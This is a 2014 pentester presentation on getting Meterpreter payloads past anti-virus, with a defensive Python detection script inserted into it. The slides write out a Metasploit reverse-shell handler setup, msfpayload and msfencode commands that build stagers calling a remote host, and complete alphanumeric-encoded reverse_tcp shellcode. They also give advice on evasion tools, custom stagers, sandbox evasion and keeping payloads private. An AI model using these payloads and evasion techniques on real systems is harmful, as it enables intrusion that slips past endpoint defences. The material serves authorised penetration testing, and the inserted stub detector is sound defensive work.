Anti-Virus Evasion Deuce
January 3, 2014
Joe Testa
Anti-Virus Got Better

- Last January I gave a talk on AV evasion.
- I showed how to craft a custom Meterpreter payload.
- Some AV products catch that now!
- This presentation shows how to get back in business.
Anti-Virus Got Better

- A lot of built-in exploits don't work anymore because of AV.
- You now have to re-write exploits yourself.
- Example: unprotected Tomcat installations can be taken over with the tomcat_mgr_deploy module.
  - Without AV, you normally get SYSTEM or root.
  - With AV, you get disappointment.
Goals

- Aside from bypassing AV for software exploits, pentesters need a way to conduct social engineering.
- Ideally, we would like a reliable way to generate EXE files that run Meterpreter when the user is tricked.
- You can write your own custom code, but then how do you safely and reliably steal hashes, hijack tokens, etc.?
Payload Overview

- Usually, the EXE doesn't contain Meterpreter itself.
- It's a stager, whose only job is to connect back to your Metasploit server and execute what it returns.
- For the last two years, pretty much all the Metasploit stagers get caught, no matter how much you encode them.
Payload Server

The server is set up with:

    msf > use exploit/multi/handler
    msf exploit(handler) > set LHOST 0.0.0.0
    LHOST => 0.0.0.0
    msf exploit(handler) > set LPORT 443
    LPORT => 443
    msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
    PAYLOAD => windows/meterpreter/reverse_tcp
    msf exploit(handler) > set ExitOnSession false
    ExitOnSession => false
    msf exploit(handler) > exploit -j
    [*] Exploit running as background job.
    [*] Started reverse handler on 0.0.0.0:443
    [*] Starting the payload handler...
IDS/IPS Evasion

- An interesting trick to confuse network IDS/IPS is to encode the payload as it travels over the network.
- One way is to set StageEncoder on the server.
  - You can use shikata_ga_nai, etc.
  - Last I checked, this is very slow!
- Another way is to use the windows/meterpreter/reverse_tcp_rc4 payload.
  - You set the RC4 key to encrypt communications.
Simple Payloads

The most basic way to create an EXE is like this:

    $ msfpayload windows/meterpreter/reverse_tcp LHOST=1.2.3.4 LPORT=443 X > payload.exe
    Created by msfpayload (http://www.metasploit.com).
    Payload: windows/meterpreter/reverse_tcp
    Length: 290
    Options: {"LHOST"=>"1.2.3.4", "LPORT"=>"443"}
    $ ls -l payload.exe
    -rw-r--r-- 1 jdog jdog 73802 Jan 2 20:57 payload.exe
    $ file payload.exe
    payload.exe: PE32 executable (GUI) Intel 80386, for MS Windows
Simple Payloads

Up until August 2011, you could bypass AV by encoding like so:

    $ msfpayload windows/meterpreter/reverse_tcp LHOST=1.2.3.4 LPORT=443 R |
      msfencode -a x86 -t exe -e x86/shikata_ga_nai -c 9 -o payload.exe
    [*] x86/shikata_ga_nai succeeded with size 317 (iteration=1)
    [*] x86/shikata_ga_nai succeeded with size 344 (iteration=2)
    [*] x86/shikata_ga_nai succeeded with size 371 (iteration=3)
    [*] x86/shikata_ga_nai succeeded with size 398 (iteration=4)
    [*] x86/shikata_ga_nai succeeded with size 425 (iteration=5)
    [*] x86/shikata_ga_nai succeeded with size 452 (iteration=6)
    [*] x86/shikata_ga_nai succeeded with size 479 (iteration=7)
    [*] x86/shikata_ga_nai succeeded with size 506 (iteration=8)
    [*] x86/shikata_ga_nai succeeded with size 533 (iteration=9)
Simple Payloads

- Last year I talked about shellcodeexec.
  - https://github.com/inquisb/shellcodeexec
- The punchline is that it takes alphanumeric-encoded shellcode, stuffs it into memory, and executes it:

    C:\Documents and Settings\root>sce.exe PYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIYlHhoyGps0wpsPnizE4qn2RDNkPRvPnksbtLLKRr24nkCBGXTOX7rjgVFQIoDqIPLlGLaqcLuRFLEpJaxOdMWqZgirL0BrPWLKV24PlKG25lfaHPnkQPbXmU9PcDszWqxPrpLKCxvxLKf8wPc1yCM3ElriNkp4LKGqhVdqKOUaiPllkqHOfmC1XG5hIpPuJT7sqmJXWKqmGT45ZBShNkf8FDS1zsPfnkflPKlK1HGls1hSlKeTNkc1JpoyPDetetskSk1qV9qJrqkOIpshCoqJnkGbxkLF1MQxp3WBWpgp58qgT3drco2trHBl1g5vfgIojumhZ0GqUPGpVIYTF4bpPhq9K0BK30iozuF0f0p
Formerly Good Payload

Here's how the alphanumeric shellcode is created:

    $ msfpayload windows/meterpreter/reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=1.2.3.4 R |
      msfencode -a x86 -e x86/alpha_mixed -t raw BufferRegister=EAX
    [*] x86/alpha_mixed succeeded with size 634 (iteration=1)
    PYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIYlHhoyGps0wpsPnizE4qn2RDNkPRvPnksbtLLKRr24nkCBGXTOX7rjgVFQIoDqIPLlGLaqcLuRFLEpJaxOdMWqZgirL0BrPWLKV24PlKG25lfaHPnkQPbXmU9PcDszWqxPrpLKCxvxLKf8wPc1yCM3ElriNkp4LKGqhVdqKOUaiPllkqHOfmC1XG5hIpPuJT7sqmJXWKqmGT45ZBShNkf8FDS1zsPfnkflPKlK1HGls1hSlKeTNkc1JpoyPDetetskSk1qV9qJrqkOIpshCoqJnkGbxkLF1MQxp3WBWpgp58qgT3drco2trHBl1g5vfgIojumhZ0GqUPGpVIYTF4bpPhq9K0BK30iozuF0f0pPf03pbpSpf03XIz4OYOYpIoKeLWPj7uE85Q7rWswtphvbWpdQslNi8fCZB0cfPWrHoiOURTcQKOXUK5YP0tflIorn5XrUZLCXzPMeORsfIoN5qz30qzs4cf67ax32JyyXsoIoYELKWFSZQP0huPb0UPWpcfbJePe8BxOTbs8eIoiEmCbs3Zc0Bv3crwbHER9I8HqOkOZuva8CtiJfLEKFrUjLXCAA
Formerly Good Payload

- Microsoft Security Essentials catches this!
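The two alphanumeric payloads on the preceding slides (generated with different LPORT values) open with exactly the same characters, which is the whole reason a static decoder stub is an easy win for the AV vendor. The following Python is an added example, not part of the presentation and not code from Metasploit or shellcodeexec: it scans process command lines for that shared stub and, as a fallback for when the stub is changed, for any unusually long purely alphanumeric argument. The stub string is copied from the slides; the sample command lines, the 64-character threshold and the "re-stubbed" blob are constructed assumptions.

```python
import re

# Decoder stub shared by both x86/alpha_mixed (BufferRegister=EAX) payloads
# shown on the slides. Because it never changes, it is a reliable signature.
ALPHA_MIXED_EAX_STUB = "PYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJI"

# Assumed threshold: an alpha_mixed-encoded stager is several hundred
# characters long (634 on the slide), so a single purely alphanumeric
# argument of 64+ characters is worth flagging even if the stub differs.
LONG_ALNUM_MIN_LEN = 64
LONG_ALNUM_RE = re.compile(r"[A-Za-z0-9]{%d,}" % LONG_ALNUM_MIN_LEN)

# Constructed stand-in for a payload whose decoder stub has been changed:
# 100 letters/digits that do not contain the known stub.
RESTUBBED_BLOB = "".join(chr(65 + (i * 7) % 26) + str(i % 10) for i in range(50))

# Constructed sample command lines (not real telemetry). The second one
# carries the first two lines of the payload printed on the slides.
SAMPLE_COMMAND_LINES = [
    r"C:\Windows\System32\notepad.exe C:\Users\alice\notes.txt",
    r"C:\Documents and Settings\root\sce.exe "
    "PYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIYlHhoyGps0wpsP"
    "nizE4qn2RDNkPRvPnksbtLLKRr24nkCBGXTOX7rjgVFQIoDqIPLlGLaqcLuRFLEpJa",
    r"C:\tools\b64.exe decode SGVsbG8gV29ybGQ=",
    r"C:\Documents and Settings\root\sce.exe " + RESTUBBED_BLOB,
]


def matches_stub_signature(text):
    """True when the known alpha_mixed decoder stub appears anywhere in text."""
    return ALPHA_MIXED_EAX_STUB in text


def long_alnum_tokens(text):
    """Every run of LONG_ALNUM_MIN_LEN or more letters/digits in text."""
    return LONG_ALNUM_RE.findall(text)


def classify_command_line(cmdline):
    """Layered check: exact stub signature first, length heuristic second."""
    if matches_stub_signature(cmdline):
        return {"verdict": "signature", "reason": "x86/alpha_mixed decoder stub present"}
    blobs = long_alnum_tokens(cmdline)
    if blobs:
        return {"verdict": "heuristic", "reason": "%d-char alphanumeric argument" % len(blobs[0])}
    return {"verdict": "clean", "reason": ""}


def scan_command_lines(cmdlines):
    """Classify each command line; returns (verdict, cmdline) pairs in order."""
    return [(classify_command_line(c)["verdict"], c) for c in cmdlines]


if __name__ == "__main__":
    for verdict, cmdline in scan_command_lines(SAMPLE_COMMAND_LINES):
        print("%-9s %s" % (verdict, cmdline[:72]))
```

Run as-is it prints clean, signature, clean, heuristic for the four samples. The base64 argument in the third line is too short to trip the heuristic, which is the trade-off behind the threshold: lower it and ordinary encoded arguments start to match; leave it and only blobs of stager size are flagged.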
Better Payloads

- There is a tool called pyinjector which reimplements the essentials of shellcodeexec in Python.
  - Creates a writeable and executable memory buffer, stuffs code into it, executes it.
  - You use pyinstaller (http://www.pyinstaller.org/) to create an EXE.
  - Available at: https://www.trustedsec.com/files/pyinjector.zip
Better Payloads

- There is a tool called Hyperion which encrypts an EXE with AES-128.
  - The output EXE brute-forces part of the key on startup.
  - http://www.nullsecurity.net/tools/binary/Hyperion-1.0.zip
- This prevents AV from extracting the key and decrypting the binary.
- The stub code for decryption is static!
  - It is open source though...
Best Payloads

- The Veil project is a toolkit for creating payloads that evade AV.
  - https://www.veil-evasion.com/
- It is a relatively new project, but is actively maintained and developed.
- Currently has 22 payloads.
Best Payloads

Current Veil payloads:

    c/meterpreter/rev_tcp
    c/meterpreter/rev_tcp_service
    c/shellcode_inject/virtual
    c/shellcode_inject/void
    cs/meterpreter/rev_tcp
    cs/shellcode_inject/base64_substitution
    cs/shellcode_inject/virtual
    native/Hyperion
    native/backdoor_factory
    native/pe_scrambler
    powershell/shellcode_inject/download_virtual
    powershell/shellcode_inject/psexec_virtual
    powershell/shellcode_inject/virtual
    python/meterpreter/rev_http_contained
    python/meterpreter/rev_https_contained
    python/meterpreter/rev_tcp
    python/shellcode_inject/aes_encrypt
    python/shellcode_inject/arc_encrypt
    python/shellcode_inject/base64_substitution
    python/shellcode_inject/des_encrypt
    python/shellcode_inject/flat
    python/shellcode_inject/letter_substitution
Best Payloads

- Veil and others seem very useful, but being open source is a bit of a weakness when it comes to AV evasion.
  - This is the same problem that Metasploit has.
- Nothing beats writing something yourself!
- Best method is to take what's out there, customize it, and keep it private.
Best Payloads

- A blog post on the Veil homepage pointed to information on how to make your own Meterpreter stager.
- With shellcodeexec, the idea was to launch the generated stager to connect to the server, download Meterpreter, and execute it.
  - shellcodeexec → alphanumeric-encoded stager → Meterpreter
- Why not write your own stager from scratch?
Best Payloads

- Someone showed how to write your own windows/meterpreter/reverse_tcp equivalent.
  - https://github.com/rsmudge/metasploit-loader
- Basically, you open a TCP connection to the Metasploit server and throw the bytes returned into an executable buffer.
- Prepend the buffer with a "mov edi, socket_id" instruction, and jump to it.
  - Meterpreter will then use the existing TCP session.
Best Payloads

- How do you customize it?
- One of the Metasploit developers mentioned that AV puts new binaries into a sandbox for the first N seconds.
- Do innocent things like read the registry, read some config files, compute digits of pi, etc.
  - Don't sleep to run down the clock!
VirusTotal

- VirusTotal (http://www.virustotal.com/) lets you upload binaries to be scanned by 46 AV products.
- It's common knowledge that they pass on samples to AV vendors.
  - They know malware authors use it.
- Your target can pull down a signature in as little as one hour.
VirusTotal

- vt-notify (https://github.com/mubix/vt-notify) uses the VirusTotal API to check the SHA-1 hash of your payload.
  - If you don't get your own API key, it uses a built-in one.
  - It's been incorporated into Veil.
- This probably tips them off that it's malware!
- Actually... this functionality as a whole was probably designed as a trap!
Building an AV Lab

- The best way to check your payload is by building your own AV lab.
- VirusTotal has 46 products, but how many corporate environments use "Kingsoft AV"?
- Symantec and McAfee seem to have the overwhelming market share.
  - Maybe throw in Kaspersky for good measure too...
Building an AV Lab

- MSDN Operating Systems subscription is $700 for 1 year.
- Symantec Small Business Edition costs $60 for a 3 year subscription for 1 endpoint.
- McAfee SaaS Endpoint Protection costs $52.
- Make sure the AV products don't phone home!
Building an AV Lab

- I'm now actively building this lab.
- Once it's set up, I'm going to evaluate all these evasion tools.
- If anyone wants to test some payloads, just let me know!
Conclusion

- To be a good pentester, you need to know how to bypass AV.
- Many built-in Metasploit modules no longer work. You have to re-write some or find alternatives.
- The success of your engagement can entirely depend upon how well you can adapt.
  - Being a programmer is extremely valuable!
